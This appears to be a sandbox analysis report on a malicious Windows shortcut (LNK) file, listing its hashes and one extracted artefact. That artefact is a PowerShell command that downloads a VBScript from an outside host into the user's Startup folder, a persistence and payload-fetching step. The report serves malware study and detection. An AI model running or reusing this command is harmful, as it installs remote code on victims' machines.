Malicious

6a2e9edf6265687db9d05813e42dba6b

LNK File
|
MD5: 6a2e9edf6265687db9d05813e42dba6b
|
Size: 1.5 KB
|
application/x-ms-shortcut

Print

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	6a2e9edf6265687db9d05813e42dba6b
Sha1	a34ff84549b10df25e6bfdd9614d0dc66e0a4aaf
Sha256	0d9be421a3aa0ed86033487a387dc429274d131d4f233e3909fde41bccc2b0c6
Sha384	d5d2b6a87b3cf2ea84c02ecdfb8a6e72ed8cede2aa96b47e8297f01019e02b4478fbc0d718794abe58f260f46f3603d0
Sha512	14d8452c15c1e1a78ef014801f83fbcd9bbf24d87232a8835d8024575df1aee22f217fae42b3c919133e74d9a6b6c7fe74b61a9f15e31e7be303ae6cb5c88c9f
SSDeep	24:8qpHYVKVWKMB4/CWqrdKkZbMe6YMfzzeSVa5/f:8EaKMHdKobMe6lhV4f
TLSH	C33123045BF60714F6F38B79ADBA622188327C56DE62CF8E0190928D1874621F4B9F3B

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -Command "$p=[Environment]::GetFolderPath('Startup');$f=Join-Path $p 'Printer32.vbs';if(!(Test-Path $f)){Invoke-WebRequest -Uri 'https://tunnel.brathost.com/Printer32.vbs' -OutFile $f -UseBasicParsing}"

6a2e9edf6265687db9d05813e42dba6b (1.5 KB)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙